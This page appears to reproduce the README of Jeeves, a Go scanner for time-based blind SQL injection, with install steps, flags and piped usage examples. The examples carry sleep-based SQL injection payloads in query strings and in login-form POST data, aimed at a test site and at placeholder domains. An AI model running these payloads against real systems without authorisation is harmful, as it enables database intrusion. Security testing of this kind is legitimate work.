Jeeves is made for looking to Time-Based Blind SQLInjection through recon.
Installing Jeeves
$ go install github.com/ferreiraklet/Jeeves@latest
OR
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h
echo ‘https://redacted.com/index.php?id=your_time_based_blind_payload_here’ | jeeves -t payload_time
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(10)))v)” | jeeves -t 10
In –payload-time you must use the time mentioned in payload
cat targets | jeeves --payload-time 5
Pay attention to the syntax! Must be the same =>
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -H “Testing: testing;OtherHeader: Value;Other2: Value”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 –proxy “http://ip:port”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -p “http://ip:port”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5 –proxy “http://ip:port” -H “User-Agent: xxxx”
Sending data through post request ( login forms, etc )
Pay attention to the syntax! Must be equal! ->
echo “https://example.com/Login.aspx” | jeeves -t 10 -d “user=(select(0)from(select(sleep(5)))v)&password=xxx”
echo “https://example.com/Login.aspx” | jeeves -t 10 -H “Header1: Value1” -d “username=admin&password=’+(select*from(select(sleep(5)))a)+'” -p “http://yourproxy:port”
You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght
Command line flags
Usage:
-t, –payload-time, The time from payload
-p, –proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, –headers Custom Headers
-d, –data Sending Post request with data
-h Show This Help Message
Using with sql payloads wordlist
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…